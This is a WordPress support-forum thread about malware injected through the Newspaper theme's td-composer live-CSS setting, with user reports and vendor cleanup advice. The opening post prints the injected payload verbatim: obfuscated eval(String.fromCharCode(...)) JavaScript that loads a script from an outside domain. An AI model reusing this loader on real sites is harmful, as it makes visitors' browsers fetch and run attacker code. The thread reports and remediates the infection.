Sucuri flags malware on td-composer plugin

Posted in: Newspaper
Post count: 3

Hi, Sucuri says that this is malware:
<style id=”tdw-css-placeholder”>var iz=String;eval(iz.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,112,115,58,47,47,115,116,97,121,46,100,101,99,101,110,116,114,97,108,97,112,112,112,115,46,99,111,109,47,115,114,99,47,112,97,103,101,46,106,115,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));</style></head>

I’ts generated from the TD-Composer plugin.

Also some AV’s says the site is not secure.

Post count: 2

TagDiv have clearly been compromised and over the last week have failed to alert customers their sites are vulnerable. It’s a terrible response to a security breach. More details on how to clean up TagDivs mess are here: https://old.reddit.com/r/Wordpress/comments/16nlg60/wpzexit/

Post count: 3

Thanks you, you solved my problem

Post count: 35449

Hi andrewmcharg and aaron1988, this problem has been resolve, just make sure that you have the latest theme version, Newspaper 12.6 and in case that your website has been infected in a previous theme version all that you need to do is to open the live css and click on save – https://i.imgur.com/tWvDnVX.png and that code will be automatically removed from database. To test if your website is infected you can search in page source after “fromCharCode”. Also, only an user that is logged in and gas an administrator account can set code in live css, so please check if you have unknow users account added recently and remove it.
If there are still some problems please contact us via email at contact@tagdiv.com and we’ll try to do our best to resolve the problem.
Thank you for your understanding!

Post count: 2

I have the same issue, but when saving the live CSS nothing happens https://nimb.ws/NWtgTE and when editing the content its an error as well. see it here https://nimb.ws/S5ae2M

I reinstalled the td-composer (downloaded from the themeforest) same issue.

Is anythingelse we can do?

thank you

  • This reply was modified 2 years by inforamk.
Post count: 35449

Hi inforamk,
Do you still have that injection in the page source?
The problem with wp-editor it can be related to that code injection but usually it is related to other settings, please check this – https://i.imgur.com/EKo1H97.pnghttps://forum.tagdiv.com/general-options-may-interfere-newspaper-theme/
In case that the problem persist, please contact us via email.
Thank you!

Post count: 2

thank you.

We never found injection in the page. Only sucuri and bitdefender reported the hack, and after several days Imunify reported this file plugins/wp-zexit/wp-zexit.php

We saw that the wp-zexit module was installed automatically and an admin user created after deletion.

We updated the td-composer and it seems no more issue, but we see the edit error reported above. We will keep searching on your recommended list.

thanks

Post count: 89

Hi Calin

We have several websites hosted on the same AWS and protected by Cloudflare and Sucuri. All three websites are on the Newspaper theme.

One year ago, only these three sites got hacked. We got Sucuri to remove the malware – who pointed at that time to a potential theme issue.

Yesterday, we got hacked again – the same three sites running on the same theme.

Sucuri points again here (wp_options.option_value, option_name=td_live_css_local_storage)

We need someone to look into this – please contact us so we can provide you access to all three sites.

Post count: 35449

Hello E K, please contact us via email at contact@tagdiv.com and we’ll help you with this problem.
The (wp_options.option_value, option_name=td_live_css_local_storage) can be exploated only by an administrator user, so if is an unknow user that you have now on those websites the infection was done using that user.
Also, the Newspaper v12.6 and 12.6.1 have some extra security added so in case that any kind of injections are attempt to be saved in the theme table to can be removed using the save button from the live css.
In case that you are facing this problem, please contact us via email.
Thank you!

Post count: 89

Have emailed you as requested, I’d really appreciate an update.

Viewing 10 posts - 1 through 10 (of 10 total)
The forum ‘Newspaper’ is closed to new topics and replies.